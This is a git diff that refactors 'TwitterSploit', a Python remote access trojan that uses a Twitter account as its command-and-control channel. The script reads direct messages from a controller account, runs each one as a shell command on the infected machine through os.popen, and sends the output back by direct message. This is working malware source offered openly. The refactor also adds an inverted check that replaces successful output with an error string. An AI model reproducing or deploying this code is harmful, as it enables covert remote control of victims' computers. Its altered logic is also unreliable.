diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..18fa2a3 --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +*.pyc +venv/ +__pycache__/ diff --git a/README.md b/README.md index 44a7f1b..ed762ae 100644 --- a/README.md +++ b/README.md @@ -1 +1,3 @@ -See SocioSploit for documentation. +# TwitterSploit + +See [SocioSploit](https://www.sociosploit.com/twitter-remote-access-trojan-twittersploit.html) for documentation. diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..421ebf2 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,10 @@ +certifi==2022.12.7 +chardet==3.0.4 +idna==2.7 +oauthlib==2.1.0 +PySocks==1.6.8 +requests==2.20.0 +requests-oauthlib==1.0.0 +six==1.11.0 +tweepy==3.6.0 +urllib3==1.26.5 diff --git a/TwitterSploit.py b/twitter_sploit.py similarity index 62% rename from TwitterSploit.py rename to twitter_sploit.py index c065465..32073b1 100755 --- a/TwitterSploit.py +++ b/twitter_sploit.py @@ -1,8 +1,9 @@ -import tweepy -import re import os +import re import time +import tweepy + ## Complete API Parameters before use -- configured for victim user ## consumer_key = '' consumer_secret = '' @@ -12,26 +13,35 @@ ## Complete info on user account ## c2_usr = '' +# Twitter auth auth = tweepy.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_token, access_token_secret) api = tweepy.API(auth) userid = re.findall(r'(?<=u\'id\': )[0-9]+', str(api.get_user(c2_usr)))[0] +# Constant strings +CONNECTION_ESTABLISHED = "[+] Twitter RAT connection established...\n" +SOMETHING_WENT_WRONG = "[-] Something went wrong...\n" +COMMAND_RECIEVED = '[+] Command Recieved - ' +COMMAND_FAILED = '[-] ERROR - COMMAND FAILED' +COMMAND_SENDING = '[+] Sending Result - \n' + + def get_command(api, lastcommand): raw_dms = api.direct_messages() - dms = re.findall(r'(?<=sender_id_str=u\''+userid+'\\\', text=u\')[^\']+', str(raw_dms)) + dms = re.findall(r'(?<=sender_id_str=u\'' + userid + + '\\\', text=u\')[^\']+', str(raw_dms)) if dms[0] != lastcommand: return dms[0] - else: - return None + return + def write_message(api, message): - api.send_direct_message(screen_name=c2_usr, text=message) + return api.send_direct_message(screen_name=c2_usr, text=message) + -last_command = None -last_command = get_command(api, last_command) -hostname = str(os.popen('hostname').read()).replace('\n','') -splash = ''' +HOSTNAME = str(os.popen('hostname').read()).replace('\n', '') +SPLASH = ''' ===================================== ==.................................== ==..........TWITTER RAT............== @@ -53,27 +63,29 @@ def write_message(api, message): _________________$$$$$$$$$$$$$$$$____ _______________$$$$$______$$$$$$$$___ _________$$$$$$$$$____________$$$$$$_ -''' % (hostname) +''' % (HOSTNAME) + try: - write_message(api, splash) - print "[+] Twitter RAT connection established...\n" + write_message(api, SPLASH) + print(CONNECTION_ESTABLISHED) except: - print "[-] Something went wrong...\n" - exit + print(SOMETHING_WENT_WRONG) + exit(1) + +last_command = get_command(api, None) while True: command = get_command(api, last_command) if command: - print '[+] Command Recieved - ' + command + print(COMMAND_RECIEVED + command) time.sleep(2) last_command = command try: result = os.popen(command).read() - if result == '': - result = '[-] ERROR - COMMAND FAILED' + if result: + result = COMMAND_FAILED except: - result = '[-] ERROR - COMMAND FAILED' - print '[-] ERROR - COMMAND FAILED' - print '[+] Sending Result - \n' + result + result = COMMAND_FAILED + print(COMMAND_SENDING + result) write_message(api, result) time.sleep(1)